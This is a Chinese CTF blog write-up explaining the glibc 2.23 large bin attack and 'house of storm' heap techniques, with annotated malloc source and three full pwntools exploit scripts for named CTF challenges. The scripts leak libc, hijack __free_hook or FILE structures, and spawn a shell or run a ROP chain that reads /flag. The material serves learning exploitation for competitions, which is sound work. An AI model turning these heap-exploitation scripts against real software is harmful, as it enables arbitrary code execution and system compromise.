large bin attack & house of strom

最新推荐文章于 2022-09-30 14:45:57 发布
最新推荐文章于 2022-09-30 14:45:57 发布
阅读量1.1k 收藏 9
点赞数 2
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 缓冲区溢出 二进制漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106699487
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

large bin attack & house of strom

large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。

为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。

在free的时候,chunk要么被放入fastbin,要么就被放到unsorted bin。当我们再次malloc的时候,如果对unsorted bin做了遍历,unsorted bin里的chunk才会被放到对应的bin,比如large bin、small bin。比如我在unsorted bin里有一个size为0x420的chunk,那么它会被放到对应的large bin里。而large bin attack就是利用了unsorted bin里未归位的chunk插入到large bin时的解链、成链操作。来看一段malloc中的源码

  1. for (;; )  
  2.    {  
  3.      int iters = 0;  
  4.      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) //遍历unsorted bin  
  5.        {  
  6.          bck = victim->bk;  
  7.          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)  
  8.              || __builtin_expect (victim->size > av->system_mem, 0))  
  9.            malloc_printerr (check_action, "malloc(): memory corruption",  
  10.                             chunk2mem (victim), av);  
  11.          size = chunksize (victim); //获得当前unsorted bin chunk的大小  
  12.   
  13.          ..........................  
  14.   
  15.          if (in_smallbin_range (size))  
  16.            {  
  17.              victim_index = smallbin_index (size);  
  18.              bck = bin_at (av, victim_index);  
  19.              fwd = bck->fd;  
  20.            }  
  21.          else //属于large bin范围  
  22.            {  
  23.              victim_index = largebin_index (size); //根据size,得到对应的large bin索引  
  24.              bck = bin_at (av, victim_index); //获取对应索引的large bin里的最后一个chunk  
  25.              fwd = bck->fd; //获得对应索引的large bin的第一个chunk  
  26.   
  27.              /* maintain large bins in sorted order */  
  28.              if (fwd != bck) //这意味着当前索引的large binchunk不为空  
  29.                {  
  30.                  /* Or with inuse bit to speed comparisons */  
  31.                  size |= PREV_INUSE;  
  32.                  /* if smaller than smallest, bypass loop below */  
  33.                  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);  
  34.                  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))  
  35.                    {  
  36.                      fwd = bck;  
  37.                      bck = bck->bk;  
  38.   
  39.                      victim->fd_nextsize = fwd->fd;  
  40.                      victim->bk_nextsize = fwd->fd->bk_nextsize;  
  41.                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;  
  42.                    }  
  43.                  else  
  44.                    {  
  45.                      assert ((fwd->size & NON_MAIN_ARENA) == 0);  
  46.                      while ((unsigned long) size < fwd->size)  
  47.                        {  
  48.                          fwd = fwd->fd_nextsize;  
  49.                          assert ((fwd->size & NON_MAIN_ARENA) == 0);  
  50.                        }  
  51.   
  52.                      if ((unsigned long) size == (unsigned long) fwd->size)  
  53.                        /* Always insert in the second position.  */  
  54.                        fwd = fwd->fd;  
  55.                      else  
  56.                        {  
  57.                          victim->fd_nextsize = fwd;  
  58.                          victim->bk_nextsize = fwd->bk_nextsize;  //fwd->bk_nextsize可控,因此victim->bk_nextsize可控  
  59.                          fwd->bk_nextsize = victim;  
  60.                          victim->bk_nextsize->fd_nextsize = victim; //第一次任意地址写入unsorted bin chunk的地址  
  61.                        }  
  62.                      bck = fwd->bk; //bk也就是large binbk位置的数据,因此bck可控  
  63.                    }  
  64.                }  
  65.              else  
  66.                victim->fd_nextsize = victim->bk_nextsize = victim;  
  67.            }  
  68.   
  69.          mark_bin (av, victim_index);  
  70.          victim->bk = bck;  
  71.          victim->fd = fwd;  
  72.          fwd->bk = victim;  
  73.          bck->fd = victim; //第二次任意地址写入unsorted bin chunk的地址  
  74.   
  75. define MAX_ITERS       10000  
  76.          if (++iters >= MAX_ITERS)  
  77.            break;  
  78.        }  

首先,victim就是unsorted bin chunk,也就在unsorted bin里未归位的large bin chunk。而fwd就是large bin的chunk。从上来看,首先,在unsorted bin里我们得有一个large bin chunk,并且在large bin里,我们也要有一个chunk,但是,我们得保证unsorted bin里的那个large bin chunksize要比large bin里已有的这个chunksize要大一点,但是都属于同一个index

这样做的目的是我们想绕过前面的这一大块,直接到后面的那个else处。

然后,假设我们通过UAF或其他漏洞,控制了large bin里的这个chunk的bk_nextsize为addr1,那么victim->bk_nextsize->fd_nextsize = victim; //第一次任意地址写入unsorted bin chunk的地址 也就是addr1->fd_nextsize = victim,也就是*(addr1+0x20) = victim,这就是第一次任意地址写一个堆地址;接下来,假如,我们还能控制large bin里那个chunk的bk为addr2,那么首先bck = fwd->bk; 使得bck = addr2,接下来bck->fd = victim; //第二次任意地址写入unsorted bin chunk的地址  也就是addr2->fd = victim,也就是*(addr2+0x10) = victim。这样利用large bin attack,我们可以有两次往任意地址写入堆地址的机会。下面,我们就来看一道题。

starctf_2019_heap_master

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

初始化

add函数

delete函数

edit函数

可以看到,这里面的edit,delete操作,都只是针对mmap出来的那片空间,而malloc出来的空间我们控制不了,无法写数据过去。也没有函数用于泄露。由此,我们可以使用large bin attack攻击IO_2_1_stdout结构体,第一次,将IO_2_1_stdout结构体的flags覆盖为堆地址,第二次利用错位将IO_2_1_stdout的_IO_write_base成员低1字节覆盖为0,这样就能泄露数据了。还有一点需要注意的是这个flags有要求

 

首先,我们需要绕过这两个if,这就要求低1字节的低4位不能为8,第二字节的低4位必须要为8,也就是,我们的unsorted bin chunk地址末尾地址应该为0x800这样

接下来,到达new_do_write,我们要让这个if成立

综上,我们的unsorted bin chunk的地址某位应该是这样的0x1800、0x3800、0x5800…这样的第二字节高4位为奇数即可,由于堆地址随机化,因此第二字节高4位我们不用管,随着堆的随机化总有一次符合要求。我们只需要满足低12bit即可,也就是,这个未归位的unsorted bin chunk,我们需要放到偏移0x800处。并且在最后,我们还需要再链入一个小的unsorted bin不然我们执行了large bin attack后,在unsorted bin里还没找到符合申请大小的chunk,就会把large bin切割,导致崩溃。

  1. #伪造8chunk  
  2. #0  
  3. edit(0,0x100,p64(0) + p64(0x421) + 'a'*0xF0)  
  4. #1  
  5. edit(0x420,0x20,p64(0) + p64(0x21) + 'b'*0x10)  
  6. #2  
  7. edit(0x440,0x20,p64(0) + p64(0x21) + 'b'*0x10)  
  8. #3  
  9. edit(0x880,0x100,p64(0) + p64(0x431) + 'c'*0xF0)  
  10. #4  
  11. edit(0xCB0,0x20,p64(0) + p64(0x21) + 'd'*0x10)  
  12. #5  
  13. edit(0xCD0,0x90,p64(0) + p64(0x91) + 'e'*0x80)  
  14. #6  
  15. edit(0xD60,0x20,p64(0) + p64(0x21) + 'f'*0x10)  
  16. #7  
  17. edit(0xD80,0x20,p64(0) + p64(0x21) + 'g'*0x10)  

如上,0将放入large bin,而3将作为在unsorted bin里未归位的large bin chunk,5将链入unsorted bin作为large bin attack以后的申请用。这样攻击了IO_2_1_stdout以后,我们就得到了glibc地址,然后,我们就可以利用house of orange来getshell了。

#coding:utf8
from pwn import *

libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
_IO_2_1_stdout_s = libc.sym['_IO_2_1_stdout_']

def add(size):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('size:',str(size))

def edit(offset,size,content):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('offset:',str(offset))
   sh.sendlineafter('size:',str(size))
   sh.sendafter('content:',content)


def delete(offset):
   sh.sendlineafter('>>','3')
   sh.sendlineafter('offset:',str(offset))

def exploit():
   #伪造8个chunk
   #0
   edit(0,0x100,p64(0) + p64(0x421) + 'a'*0xF0)
   #1
   edit(0x420,0x20,p64(0) + p64(0x21) + 'b'*0x10)
   #2
   edit(0x440,0x20,p64(0) + p64(0x21) + 'b'*0x10)
   #3
   edit(0x880,0x100,p64(0) + p64(0x431) + 'c'*0xF0)
   #4
   edit(0xCB0,0x20,p64(0) + p64(0x21) + 'd'*0x10)
   #5
   edit(0xCD0,0x90,p64(0) + p64(0x91) + 'e'*0x80)
   #6
   edit(0xD60,0x20,p64(0) + p64(0x21) + 'f'*0x10)
   #7
   edit(0xD80,0x20,p64(0) + p64(0x21) + 'g'*0x10)

   #0进入unsored bin
   delete(0x10)
   #malloc_consolidate将0放入large bin
   add(0x430)
   #接下来,为了在bk和bk_nextsize处都有libc指针,我们要继续伪造unsorted bin
   #在bk_nextsize处留下libc指针
   edit(0x10,0xF0,p64(0) + p64(0x91) + 'a'*0x80 + (p64(0) + p64(0x21) + 'a'*0x10) * 3)
   delete(0x20)
   add(0x80) #把unsorted bin申请掉
   #在bk留下libc指针
   edit(0,0x10,p64(0) + p64(0xC1))
   delete(0x10)
   add(0xB0) #把unsorted bin申请掉
   #修改large bin的bk,指向stdout
   edit(0x10,0xA,p64(0) + p16((0x2 << 12) + ((_IO_2_1_stdout_s - 0x10) & 0xFFF)))
   #修改large bin的bk_nextsize
   edit(0x20,0xA,p64(0) + p16((0x2 << 12) + ((_IO_2_1_stdout_s + 0x20 - 0x20 - 0x7) & 0xFFF)))
   #恢复large bin的头size
   edit(0,0x10,p64(0) + p64(0x421))
   #3放入unsorted bin,3属于未归位的large bin
   delete(0x890)
   #0x90的堆放入unsorted bin
   delete(0xCE0)
   #遍历unsorted bin时发生large bin attack,攻击io_2_1_stdout
   add(0x80)
   sh.recv(1)
   sh.recv(0x18)
   libc_base = u64(sh.recv(8)) - libc.symbols['_IO_file_jumps']
   print 'libc_base=',hex(libc_base)
   if libc_base >> 40 != 0x7F:
      raise Exception('leak error')
   _IO_list_all_addr = libc_base + libc.symbols['_IO_list_all']
   system_addr = libc_base + libc.sym['system']
   binsh_addr = libc_base + libc.search('/bin/sh').next()
   _IO_str_finish_ptr_addr = libc_base + 0x3C37B0
   print '_IO_list_all_addr=',hex(_IO_list_all_addr)
   print '_IO_str_finish_ptr_addr=',hex(_IO_str_finish_ptr_addr)
   print 'system_addr=',hex(system_addr)
   print 'binsh_addr=',hex(binsh_addr)

   #house of orange
   fake_file = p64(0) + p64(0x61) #unsorted bin attack
   fake_file += p64(0) + p64(_IO_list_all_addr - 0x10)
   #_IO_write_base < _IO_write_ptr
   fake_file += p64(0) + p64(1)
   fake_file += p64(0) + p64(binsh_addr)
   fake_file = fake_file.ljust(0xC0,'\x00')
   fake_file += p64(0)*3
   fake_file += p64(_IO_str_finish_ptr_addr - 0x18) #vtable
   fake_file += p64(0)
   fake_file += p64(system_addr)
   delete(0xCE0) #unsorted bin
   edit(0xCD0,len(fake_file),fake_file) #修改unsorted bin内容
   #getshell
   add(1)

while True:
   try:
      global sh
      #sh = process('./starctf_2019_heap_master')
      sh = remote('node3.buuoj.cn',29960)
      exploit()
      sh.interactive()
   except:
      sh.close()
      print 'trying...'

house of strom

理解了large bin attack,接下来,我们就可以来看house of strom了,house of strom可以实现任意地址分配,看看前面的这道题,我们是将一个合法的unsorted bin chunk链接到unsorted bin里未归位的large bin chunk的bk处,假设,我们将一个任意地址比如addr链接到unsorted bin里未归位的large bin chunkbk处,然后执行large bin attack会发生什么。

那么,在large bin attack阶段不会有问题,只是接下来,继续遍历,取到我们链接上的这个chunk时,检查其size,不符合要求然后崩溃。我们可以利用前面的large bin attack,先将addr处的size的位置写上一个堆指针,我们可以利用错位法,这样,在size处留下了chunk地址值的第6字节数据,在开启PIE的情况下,一般为0x550x56,这样,我们malloc(0x40),遍历到第一个未归位的large bin chunk时,发生large bin attack,接下来遍历到后面这个任意地址的chunk时,发现size符合要求,直接返回给用户,就可以成功把这个任意地址的空间申请过来。

这就是house of strom的原理。

我们来看两道题

rctf_2019_babyheap

首先,检查一下程序的保护机制

沙箱禁用了execve调用,因此我们只能使用open、read、write来读flag

然后,我们用IDA分析一下,禁用fastbin,因此不能使用fastbin attack。

Edit功能存在null off by one漏洞。

Add功能里size比较自由

首先就是利用null off by one构造overlap chunk,然后利用malloc_consolidate将一个chunk放到large bin,另一个放到unsorted bin,然后利用overlap chunk去控制这两个bin的指针。然后malloc(0x48)触发large bin attack的同时将会把任意地址申请过来。

我们用house of strom申请到free_hook处,劫持free_hook为setcontext+xx处,这样就能将栈切换到堆里,我们提前在堆里布置好rop即可。

#coding:utf8
from pwn import *

context(os='linux',arch='amd64')
#sh = process('./rctf_2019_babyheap')
sh = remote('node3.buuoj.cn',28529)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
setcontext_s = libc.sym['setcontext']
open_s = libc.sym['open']
read_s = libc.sym['read']
write_s = libc.sym['write']


def add(size):
   sh.sendlineafter('Choice:','1')
   sh.sendlineafter('Size:',str(size))

def edit(index,content):
   sh.sendlineafter('Choice:','2')
   sh.sendlineafter('Index:',str(index))
   sh.sendafter('Content:',content)

def delete(index):
   sh.sendlineafter('Choice:','3')
   sh.sendlineafter('Index:',str(index))

def show(index):
   sh.sendlineafter('Choice:','4')
   sh.sendlineafter('Index:',str(index))

add(0xF0) #0
add(0x38) #1
add(0x3F0) #2 large bin chunk
add(0x10) #3
add(0xF0) #4
add(0x48) #5
add(0x3F0) #6 large bin chunk
add(0x100) #7

delete(0)
#null off by one
edit(1,'a'*0x30 + p64(0x40 + 0x100))
delete(2)
add(0xF0) #0
show(1)
sh.recv(1)
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
setcontext_addr = libc_base + setcontext_s
write_addr = libc_base + write_s
open_addr = libc_base + open_s
read_addr = libc_base + read_s
pop_rdi = libc_base + 0x0000000000021102
pop_rsi = libc_base + 0x00000000000202e8
pop_rdx = libc_base + 0x0000000000001b92
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'setcontext_addr=',hex(setcontext_addr)
#将剩余部分申请,现在2与1重合
add(0x430) #2

#继续用同样的方法,构造一个未归位的large bin,并且比前一个大一些,但是要保证处于同一个index内
delete(4)
edit(5,'b'*0x40 + p64(0x50 + 0x100))
delete(6)
add(0xF0) #4
#将剩余部分申请,5与6重合
add(0x440) #6
#2放入unsorted bin
delete(2)
#2放入large bin
add(0x500) #2
#6放入unsorted bin
delete(6)
#现在,堆布局是unsorted bin里一个未归位的large bin,large bin里有一个chunk,且unsorted bin里的比large bin里的大
#将free_hook_addr链接到unsorted bin chunk的bk
fake_chunk = free_hook_addr - 0x10
edit(5,p64(0) + p64(fake_chunk))
#控制large bin的bk_nextsize,目的是解链时向bk_nextsize->fd_nextsize写入一个堆地址,我们可以以此来伪造size
payload = p64(0) + p64(fake_chunk + 0x8) #bk,只需保证是一个可写的地址即可
payload += p64(0) + p64(fake_chunk - 0x18 - 0x5)
edit(1,payload)
##触发house of storm,申请到free_hook处
add(0x48) #6
#写free_hook,栈迁移到堆里
'''mov     rsp, [rdi+0A0h]
...'''
rop = p64(0) + p64(pop_rsi) + p64(free_hook_addr + 0x40) + p64(pop_rdx) + p64(0x200) + p64(read_addr)
payload = p64(setcontext_addr + 0x35) + '\x00'*0x8
payload += rop
edit(6,payload)
#设置0xA0偏移处的值
edit(7,'a'*0xA0 + p64(free_hook_addr + 0x10) + p64(pop_rdi))
#栈迁移到free_hook_addr + 0x10,执行read,继续输入后续rop
delete(7)
flag_addr = free_hook_addr + 0x40 + 0x98
rop2 = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(open_addr)
rop2 += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x30) + p64(read_addr)
rop2 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x30) + p64(write_addr)
rop2 += '/flag\x00'

sleep(1)
sh.send(rop2)

sh.interactive()

0ctf_2018_heapstorm2

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

存在一个null off by one漏洞,但是prev_size不可控。

由此,我们可以使用shrink unsorted bin的方法来构造overlap chunk。

Show功能需要满足条件才能使用

因此,我们需要利用house of strom申请到堆指针数组处,也就是0x13370800这个地址处,然后控制其里面的数据,使得我们能够调用show,进而泄露地址,然后通过edit去修改free_hook,从而getshell。

#coding:utf8
from pwn import *

sh = process('./0ctf_2018_heapstorm2')
#sh = remote('node3.buuoj.cn',26323)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook_s = libc.sym['__malloc_hook']
free_hook_s = libc.sym['__free_hook']
system_s = libc.sym['system']
binsh_s = libc.search('/bin/sh').next()

def add(size):
   sh.sendlineafter('Command:','1')
   sh.sendlineafter('Size:',str(size))

def edit(index,size,content):
   sh.sendlineafter('Command:','2')
   sh.sendlineafter('Index:',str(index))
   sh.sendlineafter('Size:',str(size))
   sh.sendafter('Content:',content)

def delete(index):
   sh.sendlineafter('Command:','3')
   sh.sendlineafter('Index:',str(index))

def show(index):
   sh.sendlineafter('Command:','4')
   sh.sendlineafter('Index:',str(index))

add(0x18) #0
add(0x410) #1
add(0x80) #2
add(0x18) #3
add(0x420) #4
add(0x80) #5
add(0x10) #6

#伪造chunk 1的尾部
edit(1,0x400,'b'*0x3F0 + p64(0x400) + p64(0x21))
#1放入unsorted bin
delete(1)
#null off by one shrink unsorted bin
edit(0,0x18-0xC,'a'*(0x18-0xC))
#从unsorted bin里切割
add(0x80) #1
add(0x360) #7
#1放入unsorted bin
delete(1)
#2向前合并
delete(2)
add(0x80) #1 将unsorted bin指针移动到下一个chunk
#将0x420的chunk申请出来,待会儿再放入large bin
add(0x410) #2
#我们用同样的方法来构造一个大一些的large bin
edit(4,0x400,'d'*0x3F0 + p64(0x400) + p64(0x31))
#4放入unsorted bin
delete(4)
#null off by one shrink unsorted bin
edit(3,0x18-0xC,'c'*(0x18-0xC))
#从unsorted bin里切割
add(0x80) #4
add(0x360) #8
#4放入unsorted bin
delete(4)
#5向前合并
delete(5)
add(0x80) #4
#将0x430的chunk申请出来,待会儿再放入unsorted bin
add(0x420) #5
#将2放入large bin,通过7我们可以large bin
delete(2)
add(0x500) #2
#5放入unsorted bin,通过8,我们可以控制一个未归位的large bin
delete(5)
#我们要分配到的目的地
fake_chunk = 0x0000000013370800 - 0x10
#控制unsorted bin相关指针
edit(8,0x10,p64(0) + p64(fake_chunk))
#控制large bin相关指针
edit(7,0x20,p64(0) + p64(fake_chunk + 0x8) + p64(0) + p64(fake_chunk - 0x18 -0x5))
add(0x48) #5
#通过5,我们可以控制整个堆指针数组了
edit(5,0x30,p64(0)*2 + p64(0x13377331) + p64(0) + p64(fake_chunk + 0x40) + p64(0x48))

edit(0,0x10,p64(0x00000000133707F3) + p64(0x8))
#泄露堆地址
show(1)
sh.recvuntil('Chunk[1]: ')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
#泄露lib指针
edit(0,0x10,p64(heap_addr + 0x10) + p64(0x8))
show(1)
sh.recvuntil('Chunk[1]: ')
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
print 'binsh_addr=',hex(binsh_addr)
edit(0,0x10,p64(free_hook_addr) + p64(0x8))
#写free_hook
edit(1,0x8,p64(system_addr))
edit(0,0x10,p64(binsh_addr) + p64(0x8))
#getshell
delete(1)

sh.interactive()

 

ha1vk
关注
专栏目录
BUUCT-PWN 0ctf_2018_heapstorm2(house of storm)
weixin_44145820的博客
04-25 1667
目录题目分析漏洞利用Exp 题目分析 这题估计是house of storm利用的起源? 因为用这种办法直接就可以做通,后面还有rctf_2019_babyheap也需要用到house of storm,但是那题限制条件多多了 init()里先把fastbin禁用了 申请了0x13370000这块内存,并且做了初始化 初始化首先读入长度为0x18的随机数,就记为3个long long随机数吧...
House of storm学习总结
Assassin
04-27 523
文章目录一、前言介绍二、漏洞产生条件三、利用方法四、原理和源码分析(一)首先要熟悉largebin和unsortedbin的特点(二)漏洞触发得关键代码五、网上大佬们得实验样例记录六、参考例题本文参考的博客内容 一、前言介绍 house of storm其实原理和利用并不复杂,个人理解就是unsorted bin attacklarge bin attack的结合,只是漏洞利用触发的条件相对比较苛刻,对漏洞利用条件的判断所花费的经历要大于判断后利用的精力。 二、漏洞产生条件 House_of_stor
Large bin attack
abelxu
11-26 1943
0x01 large bin Large bins 中一共包括 63 个 bin,index为64~126,每个 bin 中的 chunk 的大小不一致,而是处于一定区间范围内。(本文讨论的代码和结构都是在glibc2.23 64位的情况) 1.largebin的一些结构 在largebin的处理过程中会用到fd_next和bk_nextsize来加快chunk的处理。 struct malloc_chunk { INTERNAL_SIZE_T prev_size; /* Size of
好好说话之Large Bin Attack
hollk’s blog
01-20 4888
large bin attack这种方法本质上并不难,只是有点绕而已。他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不过large chunk还需要考虑fd_nextsize和bk_nextsize这两个结构。接下来就剩Tcache attackHouse系列啦!终于要熬出头了???? 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
PRO(2.31largebin attack)
qq_33590156的博客
12-04 2883
关于largebin pro版本给了修复chunk flag的函数,而且show和edit都只看flag,free还没清指针,可以各种UAF。 但是,add中只能申请large chunk,这导致UAF不能进行任意地址申请,而且版本是libc2.31。 所以我们能用的就只能是largebin attack了,首先利用原理是,在largebin的管理中,采用先进先出的原则(插队头,取队尾),而且会排序,队头大,到队尾依次变小, 四个指针: fd是从队头一直指向队尾,队尾的fd指向main_arena; bk则
Largebin Attack原理详解
qq_41252520的博客
08-07 1586
攻击成效:能够向任意地址写堆地址,常配合其他攻击手法实现getshell。条件:能够修改Largebin−>bkLargebin−>bk。研究环境:Glibc2.31\textcolor{green}{研究环境:Glibc2.31}研究环境:Glibc2.31现在总结一下Largebin attack的一些利用条件和步骤。能够修改Largebin中的块的字段。程序中至少能够分配三种属于Largebin的不同大小的块。分配一块大小。...
house of banana .pdf
09-05
为了应对这一变化,攻击者转向了large bin attack,通过House of Strom技术实现任意地址的内存分配。 然而,从glibc 2.29版本开始,即使large bin attack也受到了限制。glibc在分配内存时进行了更严格的检查,包括...
Strom项目依赖
08-22
标题中的"Strom项目依赖"指的是Apache Storm项目在开发过程中所依赖的各种库文件,这些文件通常是Java Archive (JAR) 文件,用于包含Java类和其他资源,使得不同项目可以在运行时共享代码。Apache Storm是一个分布式...
Strom流处理的基础知识总结
04-19
Strom流处理的基础知识总结】 Strom是一个分布式实时计算系统,由Twitter开源,用于处理大规模数据流。它被设计成可扩展、容错且低延迟的,适用于实时数据分析、在线机器学习、持续计算和大数据处理等多个场景。...
GPU数据库PG_strom的安装及使用
03-23
- 修改 `/etc/profile` 文件,添加 PostgreSQL 的 bin 目录到 PATH 环境变量中: `export PATH=$PATH:/usr/pgsql-9.5/bin`。 - 刷新环境变量: `source /etc/profile`。 - 确认 `pg_config` 命令可用且路径正确: `which...
Largebin_Attack知识理解(附赠堆分配释放过程回忆!)
最新发布
a2590035252的博客
09-30 1163
朋友们好啊,我史混源行易太极门掌门人peiWhao。刚才有个朋友问我P老师发生甚么事了,我说怎么回事,给我发了几个网址,我一看!奥!原来是昨天,有一个年轻知识点,一个事largebin、、、、、、
House of storm
tbsqigongzi的博客
08-05 828
结合了unsorted_bin_attackLargebin_attack的攻击技术,实现任意地址分配chunk,任意地址写。
house of storm
m0_64195960的博客
09-04 1603
house of storm
house_of_storm
qq_51474381的博客
05-14 143
1.漏洞利用条件 glibc版本小于2.30,因为2.30之后加入了检查 需要攻击者在 large_bin 和 unsorted_bin 中分别布置一个chunk 这两个chunk需要在归位之后处于同一个 largebin 的index中且 unsorted_bin 中的chunk要比 large_bin 中的大 需要 unsorted_bin 中的 bk指针 可控 需要 large_bin 中的 bk指针和bk_nextsize 指针可控 2.漏洞功能 任意写(任意分配chunk再写)...
unsort bin attack -攻防世界 noleak
csdn546229768的博客
12-09 723
带着问题的学习是有效的 例题:攻防世界noleak ,这题解法好像有多种但是我是刚接触堆也是抱着学习的姿势学习攻击思路,这里就先例举我看明白的2种方式(爆破(在爆破__malloc_hook文章里面)、unsort bin攻击) 在ida分析后得到以下结果: 总结: 1.用于保存chunk指针的bss数组最多存储10个 2.free时有double free、uaf漏洞 3.可以编辑free chunk数据,有堆溢出漏洞 4.因为程序简单但是因为开了got不可写的措施导致题目有了很多玩法 没有开N
好好说话之Fastbin Attack(3):Alloc to Stack
hollk’s blog
12-17 1417
真的是好久好久都没更新了。。。。最近换工作再加上考CISP-PTE认证耽误了很长一段时间,这段时间打算把CISP-PTE的一些考点总结出来,如果你是做渗透工作或者ctf的web手,这个认证其实并不难。再来说说这篇文章吧,Alloc to Stack这种利用技巧其实和前面两篇区别不大,只不过就是伪造的chunk放在了栈上。这篇文章不会很长,因为wiki上没有适配的例子,自己也没找到。如果有做过这种技巧的例子的师傅,欢迎评论区留言~wiki上2015 9447 CTF : Search Engine这道题我会在
house of storm+堆SROP+orw
tbsqigongzi的博客
08-10 446
house of storm + srop + orw
house of storm 的利用
蚁景网安学院
07-01 809
题目逻辑init_data利用mallopt函数将fastbin关闭,并且通过mmap函数分配一段地址空间,空间的范围为0x13370000-0x13371000,通过fd=open(&...
PWN】Unsorted binLarge binAttack
u014377094的博客
05-03 868
今天继续整理攻击方法,逆水行舟,不进则退。 Unsorted bin attackLarge bin attack两者我还是放在一起了,因为两者相近,都是通过修改bk(bk_nextsize)来实现对一块区域的修改,漏洞在于缺少*(bk)->fd的检测。 unsortedbin的利用点 /* remove from unsorted list */ if (__glibc_unlikely (bck->fd != victim))
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值